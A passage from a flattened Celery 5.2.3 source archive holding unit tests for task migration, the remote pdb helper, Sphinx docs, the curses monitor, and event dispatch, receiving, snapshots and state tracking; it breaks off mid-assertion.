x.total_apx = 100 assert x.strtotal == '100' def test_repr(self): x = State() assert repr(x) x.filtered = 'foo' assert repr(x) class test_move: @contextmanager def move_context(self, **kwargs): with patch('celery.contrib.migrate.start_filter') as start: with patch('celery.contrib.migrate.republish') as republish: pred = Mock(name='predicate') move(pred, app=self.app, connection=self.app.connection(), **kwargs) start.assert_called() callback = start.call_args[0][2] yield callback, pred, republish def msgpair(self, **kwargs): body = dict({'task': 'add', 'id': 'id'}, **kwargs) return body, Message(body) def test_move(self): with self.move_context() as (callback, pred, republish): pred.return_value = None body, message = self.msgpair() callback(body, message) message.ack.assert_not_called() republish.assert_not_called() pred.return_value = 'foo' callback(body, message) message.ack.assert_called_with() republish.assert_called() def test_move_transform(self): trans = Mock(name='transform') trans.return_value = Queue('bar') with self.move_context(transform=trans) as (callback, pred, republish): pred.return_value = 'foo' body, message = self.msgpair() with patch('celery.contrib.migrate.maybe_declare') as maybed: callback(body, message) trans.assert_called_with('foo') maybed.assert_called() republish.assert_called() def test_limit(self): with self.move_context(limit=1) as (callback, pred, republish): pred.return_value = 'foo' body, message = self.msgpair() with pytest.raises(StopFiltering): callback(body, message) republish.assert_called() def test_callback(self): cb = Mock() with self.move_context(callback=cb) as (callback, pred, republish): pred.return_value = 'foo' body, message = self.msgpair() callback(body, message) republish.assert_called() cb.assert_called() class test_start_filter: def test_start(self): with patch('celery.contrib.migrate.eventloop') as evloop: app = Mock() filt = Mock(name='filter') conn = Connection('memory://') evloop.side_effect = StopFiltering() app.amqp.queues = {'foo': Queue('foo'), 'bar': Queue('bar')} consumer = app.amqp.TaskConsumer.return_value = Mock(name='consum') consumer.queues = list(app.amqp.queues.values()) consumer.channel = conn.default_channel consumer.__enter__ = Mock(name='consumer.__enter__') consumer.__exit__ = Mock(name='consumer.__exit__') consumer.callbacks = [] def register_callback(x): consumer.callbacks.append(x) consumer.register_callback = register_callback start_filter(app, conn, filt, queues='foo,bar', ack_messages=True) body = {'task': 'add', 'id': 'id'} for callback in consumer.callbacks: callback(body, Message(body)) consumer.callbacks[:] = [] cb = Mock(name='callback=') start_filter(app, conn, filt, tasks='add,mul', callback=cb) for callback in consumer.callbacks: callback(body, Message(body)) cb.assert_called() on_declare_queue = Mock() start_filter(app, conn, filt, tasks='add,mul', queues='foo', on_declare_queue=on_declare_queue) on_declare_queue.assert_called() start_filter(app, conn, filt, queues=['foo', 'bar']) consumer.callbacks[:] = [] state = State() start_filter(app, conn, filt, tasks='add,mul', callback=cb, state=state, limit=1) stop_filtering_raised = False for callback in consumer.callbacks: try: callback(body, Message(body)) except StopFiltering: stop_filtering_raised = True assert state.count assert stop_filtering_raised class test_filter_callback: def test_filter(self): callback = Mock() filt = filter_callback(callback, ['add', 'mul']) t1 = {'task': 'add'} t2 = {'task': 'div'} message = Mock() filt(t2, message) 
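# 'div' is not in the allowed task names, so the wrapped callback must not
# fire; the 'add' message below does match and is forwarded with the message.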
callback.assert_not_called() filt(t1, message) callback.assert_called_with(t1, message) def test_task_id_in(): assert task_id_in(['A'], {'id': 'A'}, Mock()) assert not task_id_in(['A'], {'id': 'B'}, Mock()) def test_task_id_eq(): assert task_id_eq('A', {'id': 'A'}, Mock()) assert not task_id_eq('A', {'id': 'B'}, Mock()) def test_expand_dest(): assert expand_dest(None, 'foo', 'bar') == ('foo', 'bar') assert expand_dest(('b', 'x'), 'foo', 'bar') == ('b', 'x') def test_maybe_queue(): app = Mock() app.amqp.queues = {'foo': 313} assert _maybe_queue(app, 'foo') == 313 assert _maybe_queue(app, Queue('foo')) == Queue('foo') def test_filter_status(): with conftest.stdouts() as (stdout, stderr): filter_status(State(), {'id': '1', 'task': 'add'}, Mock()) assert stdout.getvalue() def test_move_by_taskmap(): with patch('celery.contrib.migrate.move') as move: move_by_taskmap({'add': Queue('foo')}) move.assert_called() cb = move.call_args[0][0] assert cb({'task': 'add'}, Mock()) def test_move_by_idmap(): with patch('celery.contrib.migrate.move') as move: move_by_idmap({'123f': Queue('foo')}) move.assert_called() cb = move.call_args[0][0] body = {'id': '123f'} assert cb(body, Message(body)) def test_move_task_by_id(): with patch('celery.contrib.migrate.move') as move: move_task_by_id('123f', Queue('foo')) move.assert_called() cb = move.call_args[0][0] body = {'id': '123f'} assert cb(body, Message(body)) == Queue('foo') class test_migrate_task: def test_removes_compression_header(self): x = Message('foo', compression='zlib') producer = Mock() migrate_task(producer, x.body, x) producer.publish.assert_called() args, kwargs = producer.publish.call_args assert isinstance(args[0], bytes) assert 'compression' not in kwargs['headers'] assert kwargs['compression'] == 'zlib' assert kwargs['content_type'] == 'application/json' assert kwargs['content_encoding'] == 'utf-8' assert kwargs['exchange'] == 'exchange' assert kwargs['routing_key'] == 'rkey' class test_migrate_tasks: def test_migrate(self, app, name='testcelery'): connection_kwargs = { 'transport_options': {'polling_interval': 0.01} } x = Connection('memory://foo', **connection_kwargs) y = Connection('memory://foo', **connection_kwargs) # use separate state x.default_channel.queues = {} y.default_channel.queues = {} ex = Exchange(name, 'direct') q = Queue(name, exchange=ex, routing_key=name) q(x.default_channel).declare() Producer(x).publish('foo', exchange=name, routing_key=name) Producer(x).publish('bar', exchange=name, routing_key=name) Producer(x).publish('baz', exchange=name, routing_key=name) assert x.default_channel.queues assert not y.default_channel.queues migrate_tasks(x, y, accept=['text/plain'], app=app) yq = q(y.default_channel) assert yq.get().body == ensure_bytes('foo') assert yq.get().body == ensure_bytes('bar') assert yq.get().body == ensure_bytes('baz') Producer(x).publish('foo', exchange=name, routing_key=name) callback = Mock() migrate_tasks(x, y, callback=callback, accept=['text/plain'], app=app) callback.assert_called() migrate = Mock() Producer(x).publish('baz', exchange=name, routing_key=name) migrate_tasks(x, y, callback=callback, migrate=migrate, accept=['text/plain'], app=app) migrate.assert_called() with patch('kombu.transport.virtual.Channel.queue_declare') as qd: def effect(*args, **kwargs): if kwargs.get('passive'): raise ChannelError('some channel error') return 0, 3, 0 qd.side_effect = effect migrate_tasks(x, y, app=app) x = Connection('memory://', **connection_kwargs) x.default_channel.queues = {} y.default_channel.queues = 
{}
        callback = Mock()
        migrate_tasks(x, y, callback=callback,
                      accept=['text/plain'], app=app)
        callback.assert_not_called()

celery-5.2.3/t/unit/contrib/test_pytest.py

import pytest

pytest_plugins = ["pytester"]

try:
    pytest.fail()
except BaseException as e:
    Failed = type(e)


@pytest.mark.skipif(
    not hasattr(pytest, "PytestUnknownMarkWarning"),
    reason="Older pytest version without marker warnings",
)
def test_pytest_celery_marker_registration(testdir):
    """Verify that using the 'celery' marker does not result in a warning"""
    testdir.plugins.append("celery")
    testdir.makepyfile(
        """
        import pytest
        @pytest.mark.celery(foo="bar")
        def test_noop():
            pass
        """
    )
    result = testdir.runpytest('-q')
    with pytest.raises((ValueError, Failed)):
        result.stdout.fnmatch_lines_random(
            "*PytestUnknownMarkWarning: Unknown pytest.mark.celery*"
        )

celery-5.2.3/t/unit/contrib/test_rdb.py

import errno
import socket
from unittest.mock import Mock, patch

import pytest

import t.skip
from celery.contrib.rdb import Rdb, debugger, set_trace
from celery.utils.text import WhateverIO


class SockErr(socket.error):
    errno = None


class test_Rdb:

    @patch('celery.contrib.rdb.Rdb')
    def test_debugger(self, Rdb):
        x = debugger()
        assert x
        assert x is debugger()

    @patch('celery.contrib.rdb.debugger')
    @patch('celery.contrib.rdb._frame')
    def test_set_trace(self, _frame, debugger):
        assert set_trace(Mock())
        assert set_trace()
        debugger.return_value.set_trace.assert_called()

    @patch('celery.contrib.rdb.Rdb.get_avail_port')
    @t.skip.if_pypy
    def test_rdb(self, get_avail_port):
        sock = Mock()
        get_avail_port.return_value = (sock, 8000)
        sock.accept.return_value = (Mock(), ['helu'])
        out = WhateverIO()
        with Rdb(out=out) as rdb:
            get_avail_port.assert_called()
            assert 'helu' in out.getvalue()

            # set_quit
            with patch('sys.settrace') as settrace:
                rdb.set_quit()
                settrace.assert_called_with(None)

            # set_trace
            with patch('celery.contrib.rdb.Pdb.set_trace') as pset:
                with patch('celery.contrib.rdb._frame'):
                    rdb.set_trace()
                    rdb.set_trace(Mock())
                    pset.side_effect = SockErr
                    pset.side_effect.errno = errno.ENOENT
                    with pytest.raises(SockErr):
                        rdb.set_trace()

            # _close_session
            rdb._close_session()
            rdb.active = True
            rdb._handle = None
            rdb._client = None
            rdb._sock = None
            rdb._close_session()

            # do_continue
            rdb.set_continue = Mock()
            rdb.do_continue(Mock())
            rdb.set_continue.assert_called_with()

            # do_quit
            rdb.set_quit = Mock()
            rdb.do_quit(Mock())
            rdb.set_quit.assert_called_with()

    @patch('socket.socket')
    @t.skip.if_pypy
    def test_get_avail_port(self, sock):
        out = WhateverIO()
        sock.return_value.accept.return_value = (Mock(), ['helu'])
        with Rdb(out=out):
            pass

        with patch('celery.contrib.rdb.current_process') as curproc:
            curproc.return_value.name = 'PoolWorker-10'
            with Rdb(out=out):
                pass

        err = sock.return_value.bind.side_effect = SockErr()
        err.errno = errno.ENOENT
        with pytest.raises(SockErr):
            with Rdb(out=out):
                pass
        err.errno = errno.EADDRINUSE
        with pytest.raises(Exception):
            with Rdb(out=out):
                pass
        called = [0]

        def effect(*a, **kw):
            try:
                if called[0] > 50:
                    return True
                raise err
            finally:
                called[0] += 1
        sock.return_value.bind.side_effect = effect
        with Rdb(out=out):
            pass
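The tests above exercise celery.contrib.rdb, Celery's remote-pdb helper, entirely through mocks. As a quick orientation only (this snippet is not part of the distributed test suite), the following sketch shows the documented way the module is normally used from application code; the project name, broker URL, and `add` task are hypothetical placeholders.

# Illustrative sketch -- 'proj', the broker URL and 'add' are made-up examples.
from celery import Celery
from celery.contrib import rdb

app = Celery('proj', broker='pyamqp://')


@app.task
def add(x, y):
    # Opens a remote pdb session; the worker log prints the port to telnet into.
    rdb.set_trace()
    return x + y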
xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/contrib/test_sphinx.py0000664000175000017500000000134100000000000020500 0ustar00asifasif00000000000000import os import pytest try: from sphinx.application import Sphinx # noqa: F401 from sphinx_testing import TestApp sphinx_installed = True except ImportError: sphinx_installed = False SRCDIR = os.path.join(os.path.dirname(__file__), 'proj') @pytest.mark.skipif( sphinx_installed is False, reason='Sphinx is not installed' ) def test_sphinx(): app = TestApp(srcdir=SRCDIR, confdir=SRCDIR) app.build() contents = open(os.path.join(app.outdir, 'contents.html'), encoding='utf-8').read() assert 'This is a sample Task' in contents assert 'This is a sample Shared Task' in contents assert ( 'This task is in a different module!' not in contents ) ././@PaxHeader0000000000000000000000000000003300000000000011451 xustar000000000000000027 mtime=1640757094.815757 celery-5.2.3/t/unit/events/0000775000175000017500000000000000000000000015423 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/events/__init__.py0000664000175000017500000000000000000000000017522 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/events/test_cursesmon.py0000664000175000017500000000437100000000000021057 0ustar00asifasif00000000000000import pytest pytest.importorskip('curses') class MockWindow: def getmaxyx(self): return self.y, self.x class test_CursesDisplay: def setup(self): from celery.events import cursesmon self.monitor = cursesmon.CursesMonitor(object(), app=self.app) self.win = MockWindow() self.monitor.win = self.win def test_format_row_with_default_widths(self): self.win.x, self.win.y = 91, 24 row = self.monitor.format_row( '783da208-77d0-40ca-b3d6-37dd6dbb55d3', 'task.task.task.task.task.task.task.task.task.tas', 'workerworkerworkerworkerworkerworkerworkerworker', '21:13:20', 'SUCCESS') assert ('783da208-77d0-40ca-b3d6-37dd6dbb55d3 ' 'workerworker... task.task.[.]tas 21:13:20 SUCCESS ' == row) def test_format_row_with_truncated_uuid(self): self.win.x, self.win.y = 80, 24 row = self.monitor.format_row( '783da208-77d0-40ca-b3d6-37dd6dbb55d3', 'task.task.task.task.task.task.task.task.task.tas', 'workerworkerworkerworkerworkerworkerworkerworker', '21:13:20', 'SUCCESS') expected = ('783da208-77d0-40ca-b3d... workerworker... ' 'task.task.[.]tas 21:13:20 SUCCESS ') assert row == expected def test_format_title_row(self): self.win.x, self.win.y = 80, 24 row = self.monitor.format_row('UUID', 'TASK', 'WORKER', 'TIME', 'STATE') assert ('UUID WORKER ' 'TASK TIME STATE ' == row) def test_format_row_for_wide_screen_with_short_uuid(self): self.win.x, self.win.y = 140, 24 row = self.monitor.format_row( '783da208-77d0-40ca-b3d6-37dd6dbb55d3', 'task.task.task.task.task.task.task.task.task.tas', 'workerworkerworkerworkerworkerworkerworkerworker', '21:13:20', 'SUCCESS') assert len(row) == 136 assert ('783da208-77d0-40ca-b3d6-37dd6dbb55d3 ' 'workerworkerworkerworkerworkerworker... 
' 'task.task.task.task.task.task.task.[.]tas ' '21:13:20 SUCCESS ' == row) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/events/test_events.py0000664000175000017500000002615400000000000020350 0ustar00asifasif00000000000000import socket from unittest.mock import Mock, call import pytest from celery.events import Event from celery.events.receiver import CLIENT_CLOCK_SKEW class MockProducer: raise_on_publish = False def __init__(self, *args, **kwargs): self.sent = [] def publish(self, msg, *args, **kwargs): if self.raise_on_publish: raise KeyError() self.sent.append(msg) def close(self): pass def has_event(self, kind): for event in self.sent: if event['type'] == kind: return event return False def test_Event(): event = Event('world war II') assert event['type'] == 'world war II' assert event['timestamp'] class test_EventDispatcher: def test_redis_uses_fanout_exchange(self): self.app.connection = Mock() conn = self.app.connection.return_value = Mock() conn.transport.driver_type = 'redis' dispatcher = self.app.events.Dispatcher(conn, enabled=False) assert dispatcher.exchange.type == 'fanout' def test_others_use_topic_exchange(self): self.app.connection = Mock() conn = self.app.connection.return_value = Mock() conn.transport.driver_type = 'amqp' dispatcher = self.app.events.Dispatcher(conn, enabled=False) assert dispatcher.exchange.type == 'topic' def test_takes_channel_connection(self): x = self.app.events.Dispatcher(channel=Mock()) assert x.connection is x.channel.connection.client def test_sql_transports_disabled(self): conn = Mock() conn.transport.driver_type = 'sql' x = self.app.events.Dispatcher(connection=conn) assert not x.enabled def test_send(self): producer = MockProducer() producer.connection = self.app.connection_for_write() connection = Mock() connection.transport.driver_type = 'amqp' eventer = self.app.events.Dispatcher(connection, enabled=False, buffer_while_offline=False) eventer.producer = producer eventer.enabled = True eventer.send('World War II', ended=True) assert producer.has_event('World War II') eventer.enabled = False eventer.send('World War III') assert not producer.has_event('World War III') evs = ('Event 1', 'Event 2', 'Event 3') eventer.enabled = True eventer.producer.raise_on_publish = True eventer.buffer_while_offline = False with pytest.raises(KeyError): eventer.send('Event X') eventer.buffer_while_offline = True for ev in evs: eventer.send(ev) eventer.producer.raise_on_publish = False eventer.flush() for ev in evs: assert producer.has_event(ev) eventer.flush() def test_send_buffer_group(self): buf_received = [None] producer = MockProducer() producer.connection = self.app.connection_for_write() connection = Mock() connection.transport.driver_type = 'amqp' eventer = self.app.events.Dispatcher( connection, enabled=False, buffer_group={'task'}, buffer_limit=2, ) eventer.producer = producer eventer.enabled = True eventer._publish = Mock(name='_publish') def on_eventer_publish(events, *args, **kwargs): buf_received[0] = list(events) eventer._publish.side_effect = on_eventer_publish assert not eventer._group_buffer['task'] eventer.on_send_buffered = Mock(name='on_send_buffered') eventer.send('task-received', uuid=1) prev_buffer = eventer._group_buffer['task'] assert eventer._group_buffer['task'] eventer.on_send_buffered.assert_called_with() eventer.send('task-received', uuid=1) assert not eventer._group_buffer['task'] eventer._publish.assert_has_calls([ call([], eventer.producer, 
'task.multi'), ]) # clear in place assert eventer._group_buffer['task'] is prev_buffer assert len(buf_received[0]) == 2 eventer.on_send_buffered = None eventer.send('task-received', uuid=1) def test_flush_no_groups_no_errors(self): eventer = self.app.events.Dispatcher(Mock()) eventer.flush(errors=False, groups=False) def test_enter_exit(self): with self.app.connection_for_write() as conn: d = self.app.events.Dispatcher(conn) d.close = Mock() with d as _d: assert _d d.close.assert_called_with() def test_enable_disable_callbacks(self): on_enable = Mock() on_disable = Mock() with self.app.connection_for_write() as conn: with self.app.events.Dispatcher(conn, enabled=False) as d: d.on_enabled.add(on_enable) d.on_disabled.add(on_disable) d.enable() on_enable.assert_called_with() d.disable() on_disable.assert_called_with() def test_enabled_disable(self): connection = self.app.connection_for_write() channel = connection.channel() try: dispatcher = self.app.events.Dispatcher(connection, enabled=True) dispatcher2 = self.app.events.Dispatcher(connection, enabled=True, channel=channel) assert dispatcher.enabled assert dispatcher.producer.channel assert (dispatcher.producer.serializer == self.app.conf.event_serializer) created_channel = dispatcher.producer.channel dispatcher.disable() dispatcher.disable() # Disable with no active producer dispatcher2.disable() assert not dispatcher.enabled assert dispatcher.producer is None # does not close manually provided channel assert not dispatcher2.channel.closed dispatcher.enable() assert dispatcher.enabled assert dispatcher.producer # XXX test compat attribute assert dispatcher.publisher is dispatcher.producer prev, dispatcher.publisher = dispatcher.producer, 42 try: assert dispatcher.producer == 42 finally: dispatcher.producer = prev finally: channel.close() connection.close() assert created_channel.closed class test_EventReceiver: def test_process(self): message = {'type': 'world-war'} got_event = [False] def my_handler(event): got_event[0] = True connection = Mock() connection.transport_cls = 'memory' r = self.app.events.Receiver( connection, handlers={'world-war': my_handler}, node_id='celery.tests', ) r._receive(message, object()) assert got_event[0] def test_accept_argument(self): r = self.app.events.Receiver(Mock(), accept={'app/foo'}) assert r.accept == {'app/foo'} def test_event_queue_prefix__default(self): r = self.app.events.Receiver(Mock()) assert r.queue.name.startswith('celeryev.') def test_event_queue_prefix__setting(self): self.app.conf.event_queue_prefix = 'eventq' r = self.app.events.Receiver(Mock()) assert r.queue.name.startswith('eventq.') def test_event_queue_prefix__argument(self): r = self.app.events.Receiver(Mock(), queue_prefix='fooq') assert r.queue.name.startswith('fooq.') def test_event_exchange__default(self): r = self.app.events.Receiver(Mock()) assert r.exchange.name == 'celeryev' def test_event_exchange__setting(self): self.app.conf.event_exchange = 'exchange_ev' r = self.app.events.Receiver(Mock()) assert r.exchange.name == 'exchange_ev' def test_catch_all_event(self): message = {'type': 'world-war'} got_event = [False] def my_handler(event): got_event[0] = True connection = Mock() connection.transport_cls = 'memory' r = self.app.events.Receiver(connection, node_id='celery.tests') r.handlers['*'] = my_handler r._receive(message, object()) assert got_event[0] def test_itercapture(self): connection = self.app.connection_for_write() try: r = self.app.events.Receiver(connection, node_id='celery.tests') it = 
r.itercapture(timeout=0.0001, wakeup=False) with pytest.raises(socket.timeout): next(it) with pytest.raises(socket.timeout): r.capture(timeout=0.00001) finally: connection.close() def test_event_from_message_localize_disabled(self): r = self.app.events.Receiver(Mock(), node_id='celery.tests') r.adjust_clock = Mock() ts_adjust = Mock() r.event_from_message( {'type': 'worker-online', 'clock': 313}, localize=False, adjust_timestamp=ts_adjust, ) ts_adjust.assert_not_called() r.adjust_clock.assert_called_with(313) def test_event_from_message_clock_from_client(self): r = self.app.events.Receiver(Mock(), node_id='celery.tests') r.clock.value = 302 r.adjust_clock = Mock() body = {'type': 'task-sent'} r.event_from_message( body, localize=False, adjust_timestamp=Mock(), ) assert body['clock'] == r.clock.value + CLIENT_CLOCK_SKEW def test_receive_multi(self): r = self.app.events.Receiver(Mock(name='connection')) r.process = Mock(name='process') efm = r.event_from_message = Mock(name='event_from_message') def on_efm(*args): return args efm.side_effect = on_efm r._receive([1, 2, 3], Mock()) r.process.assert_has_calls([call(1), call(2), call(3)]) def test_itercapture_limit(self): connection = self.app.connection_for_write() channel = connection.channel() try: events_received = [0] def handler(event): events_received[0] += 1 producer = self.app.events.Dispatcher( connection, enabled=True, channel=channel, ) r = self.app.events.Receiver( connection, handlers={'*': handler}, node_id='celery.tests', ) evs = ['ev1', 'ev2', 'ev3', 'ev4', 'ev5'] for ev in evs: producer.send(ev) it = r.itercapture(limit=4, wakeup=True) next(it) # skip consumer (see itercapture) list(it) assert events_received[0] == 4 finally: channel.close() connection.close() def test_State(app): state = app.events.State() assert dict(state.workers) == {} def test_default_dispatcher(app): with app.events.default_dispatcher() as d: assert d assert d.connection ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/t/unit/events/test_snapshot.py0000664000175000017500000000642100000000000020676 0ustar00asifasif00000000000000from unittest.mock import Mock, patch import pytest from celery.app.events import Events from celery.events.snapshot import Polaroid, evcam class MockTimer: installed = [] def call_repeatedly(self, secs, fun, *args, **kwargs): self.installed.append(fun) return Mock(name='TRef') timer = MockTimer() class test_Polaroid: def setup(self): self.state = self.app.events.State() def test_constructor(self): x = Polaroid(self.state, app=self.app) assert x.app is self.app assert x.state is self.state assert x.freq assert x.cleanup_freq assert x.logger assert not x.maxrate def test_install_timers(self): x = Polaroid(self.state, app=self.app) x.timer = timer x.__exit__() x.__enter__() assert x.capture in MockTimer.installed assert x.cleanup in MockTimer.installed x._tref.cancel.assert_not_called() x._ctref.cancel.assert_not_called() x.__exit__() x._tref.cancel.assert_called() x._ctref.cancel.assert_called() x._tref.assert_called() x._ctref.assert_not_called() def test_cleanup(self): x = Polaroid(self.state, app=self.app) cleanup_signal_sent = [False] def handler(**kwargs): cleanup_signal_sent[0] = True x.cleanup_signal.connect(handler) x.cleanup() assert cleanup_signal_sent[0] def test_shutter__capture(self): x = Polaroid(self.state, app=self.app) shutter_signal_sent = [False] def handler(**kwargs): shutter_signal_sent[0] = True x.shutter_signal.connect(handler) x.shutter() 
assert shutter_signal_sent[0] shutter_signal_sent[0] = False x.capture() assert shutter_signal_sent[0] def test_shutter_maxrate(self): x = Polaroid(self.state, app=self.app, maxrate='1/h') shutter_signal_sent = [0] def handler(**kwargs): shutter_signal_sent[0] += 1 x.shutter_signal.connect(handler) for i in range(30): x.shutter() x.shutter() x.shutter() assert shutter_signal_sent[0] == 1 class test_evcam: class MockReceiver: raise_keyboard_interrupt = False def capture(self, **kwargs): if self.__class__.raise_keyboard_interrupt: raise KeyboardInterrupt() class MockEvents(Events): def Receiver(self, *args, **kwargs): return test_evcam.MockReceiver() def setup(self): self.app.events = self.MockEvents() self.app.events.app = self.app def test_evcam(self, restore_logging): evcam(Polaroid, timer=timer, app=self.app) evcam(Polaroid, timer=timer, loglevel='CRITICAL', app=self.app) self.MockReceiver.raise_keyboard_interrupt = True try: with pytest.raises(SystemExit): evcam(Polaroid, timer=timer, app=self.app) finally: self.MockReceiver.raise_keyboard_interrupt = False @patch('celery.platforms.create_pidlock') def test_evcam_pidfile(self, create_pidlock): evcam(Polaroid, timer=timer, pidfile='/var/pid', app=self.app) create_pidlock.assert_called_with('/var/pid') ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/events/test_state.py0000664000175000017500000005342700000000000020167 0ustar00asifasif00000000000000import pickle from decimal import Decimal from itertools import count from random import shuffle from time import time from unittest.mock import Mock, patch import pytest from celery import states, uuid from celery.events import Event from celery.events.state import (HEARTBEAT_DRIFT_MAX, HEARTBEAT_EXPIRE_WINDOW, State, Task, Worker, heartbeat_expires) class replay: def __init__(self, state): self.state = state self.rewind() self.setup() self.current_clock = 0 def setup(self): pass def next_event(self): ev = self.events[next(self.position)] ev['local_received'] = ev['timestamp'] try: self.current_clock = ev['clock'] except KeyError: ev['clock'] = self.current_clock = self.current_clock + 1 return ev def __iter__(self): return self def __next__(self): try: self.state.event(self.next_event()) except IndexError: raise StopIteration() next = __next__ def rewind(self): self.position = count(0) return self def play(self): for _ in self: pass class ev_worker_online_offline(replay): def setup(self): self.events = [ Event('worker-online', hostname='utest1'), Event('worker-offline', hostname='utest1'), ] class ev_worker_heartbeats(replay): def setup(self): self.events = [ Event('worker-heartbeat', hostname='utest1', timestamp=time() - HEARTBEAT_EXPIRE_WINDOW * 2), Event('worker-heartbeat', hostname='utest1'), ] class ev_task_states(replay): def setup(self): tid = self.tid = uuid() tid2 = self.tid2 = uuid() self.events = [ Event('task-received', uuid=tid, name='task1', args='(2, 2)', kwargs="{'foo': 'bar'}", retries=0, eta=None, hostname='utest1'), Event('task-started', uuid=tid, hostname='utest1'), Event('task-revoked', uuid=tid, hostname='utest1'), Event('task-retried', uuid=tid, exception="KeyError('bar')", traceback='line 2 at main', hostname='utest1'), Event('task-failed', uuid=tid, exception="KeyError('foo')", traceback='line 1 at main', hostname='utest1'), Event('task-succeeded', uuid=tid, result='4', runtime=0.1234, hostname='utest1'), Event('foo-bar'), Event('task-received', uuid=tid2, name='task2', args='(4, 4)', 
kwargs="{'foo': 'bar'}", retries=0, eta=None, parent_id=tid, root_id=tid, hostname='utest1'), ] def QTEV(type, uuid, hostname, clock, name=None, timestamp=None): """Quick task event.""" return Event(f'task-{type}', uuid=uuid, hostname=hostname, clock=clock, name=name, timestamp=timestamp or time()) class ev_logical_clock_ordering(replay): def __init__(self, state, offset=0, uids=None): self.offset = offset or 0 self.uids = self.setuids(uids) super().__init__(state) def setuids(self, uids): uids = self.tA, self.tB, self.tC = uids or [uuid(), uuid(), uuid()] return uids def setup(self): offset = self.offset tA, tB, tC = self.uids self.events = [ QTEV('received', tA, 'w1', name='tA', clock=offset + 1), QTEV('received', tB, 'w2', name='tB', clock=offset + 1), QTEV('started', tA, 'w1', name='tA', clock=offset + 3), QTEV('received', tC, 'w2', name='tC', clock=offset + 3), QTEV('started', tB, 'w2', name='tB', clock=offset + 5), QTEV('retried', tA, 'w1', name='tA', clock=offset + 7), QTEV('succeeded', tB, 'w2', name='tB', clock=offset + 9), QTEV('started', tC, 'w2', name='tC', clock=offset + 10), QTEV('received', tA, 'w3', name='tA', clock=offset + 13), QTEV('succeded', tC, 'w2', name='tC', clock=offset + 12), QTEV('started', tA, 'w3', name='tA', clock=offset + 14), QTEV('succeeded', tA, 'w3', name='TA', clock=offset + 16), ] def rewind_with_offset(self, offset, uids=None): self.offset = offset self.uids = self.setuids(uids or self.uids) self.setup() self.rewind() class ev_snapshot(replay): def setup(self): self.events = [ Event('worker-online', hostname='utest1'), Event('worker-online', hostname='utest2'), Event('worker-online', hostname='utest3'), ] for i in range(20): worker = not i % 2 and 'utest2' or 'utest1' type = not i % 2 and 'task2' or 'task1' self.events.append(Event('task-received', name=type, uuid=uuid(), hostname=worker)) class test_Worker: def test_equality(self): assert Worker(hostname='foo').hostname == 'foo' assert Worker(hostname='foo') == Worker(hostname='foo') assert Worker(hostname='foo') != Worker(hostname='bar') assert hash(Worker(hostname='foo')) == hash(Worker(hostname='foo')) assert hash(Worker(hostname='foo')) != hash(Worker(hostname='bar')) def test_heartbeat_expires__Decimal(self): assert heartbeat_expires( Decimal(344313.37), freq=60, expire_window=200) == 344433.37 def test_compatible_with_Decimal(self): w = Worker('george@vandelay.com') timestamp, local_received = Decimal(time()), time() w.event('worker-online', timestamp, local_received, fields={ 'hostname': 'george@vandelay.com', 'timestamp': timestamp, 'local_received': local_received, 'freq': Decimal(5.6335431), }) assert w.alive def test_eq_ne_other(self): assert Worker('a@b.com') == Worker('a@b.com') assert Worker('a@b.com') != Worker('b@b.com') assert Worker('a@b.com') != object() def test_reduce_direct(self): w = Worker('george@vandelay.com') w.event('worker-online', 10.0, 13.0, fields={ 'hostname': 'george@vandelay.com', 'timestamp': 10.0, 'local_received': 13.0, 'freq': 60, }) fun, args = w.__reduce__() w2 = fun(*args) assert w2.hostname == w.hostname assert w2.pid == w.pid assert w2.freq == w.freq assert w2.heartbeats == w.heartbeats assert w2.clock == w.clock assert w2.active == w.active assert w2.processed == w.processed assert w2.loadavg == w.loadavg assert w2.sw_ident == w.sw_ident def test_update(self): w = Worker('george@vandelay.com') w.update({'idx': '301'}, foo=1, clock=30, bah='foo') assert w.idx == '301' assert w.foo == 1 assert w.clock == 30 assert w.bah == 'foo' def 
test_survives_missing_timestamp(self): worker = Worker(hostname='foo') worker.event('heartbeat') assert worker.heartbeats == [] def test_repr(self): assert repr(Worker(hostname='foo')) def test_drift_warning(self): worker = Worker(hostname='foo') with patch('celery.events.state.warn') as warn: worker.event(None, time() + (HEARTBEAT_DRIFT_MAX * 2), time()) warn.assert_called() assert 'Substantial drift' in warn.call_args[0][0] def test_updates_heartbeat(self): worker = Worker(hostname='foo') worker.event(None, time(), time()) assert len(worker.heartbeats) == 1 h1 = worker.heartbeats[0] worker.event(None, time(), time() - 10) assert len(worker.heartbeats) == 2 assert worker.heartbeats[-1] == h1 class test_Task: def test_equality(self): assert Task(uuid='foo').uuid == 'foo' assert Task(uuid='foo') == Task(uuid='foo') assert Task(uuid='foo') != Task(uuid='bar') assert hash(Task(uuid='foo')) == hash(Task(uuid='foo')) assert hash(Task(uuid='foo')) != hash(Task(uuid='bar')) def test_info(self): task = Task(uuid='abcdefg', name='tasks.add', args='(2, 2)', kwargs='{}', retries=2, result=42, eta=1, runtime=0.0001, expires=1, parent_id='bdefc', root_id='dedfef', foo=None, exception=1, received=time() - 10, started=time() - 8, exchange='celery', routing_key='celery', succeeded=time()) assert sorted(list(task._info_fields)) == sorted(task.info().keys()) assert (sorted(list(task._info_fields + ('received',))) == sorted(task.info(extra=('received',)))) assert (sorted(['args', 'kwargs']) == sorted(task.info(['args', 'kwargs']).keys())) assert not list(task.info('foo')) def test_reduce_direct(self): task = Task(uuid='uuid', name='tasks.add', args='(2, 2)') fun, args = task.__reduce__() task2 = fun(*args) assert task == task2 def test_ready(self): task = Task(uuid='abcdefg', name='tasks.add') task.event('received', time(), time()) assert not task.ready task.event('succeeded', time(), time()) assert task.ready def test_sent(self): task = Task(uuid='abcdefg', name='tasks.add') task.event('sent', time(), time()) assert task.state == states.PENDING def test_merge(self): task = Task() task.event('failed', time(), time()) task.event('started', time(), time()) task.event('received', time(), time(), { 'name': 'tasks.add', 'args': (2, 2), }) assert task.state == states.FAILURE assert task.name == 'tasks.add' assert task.args == 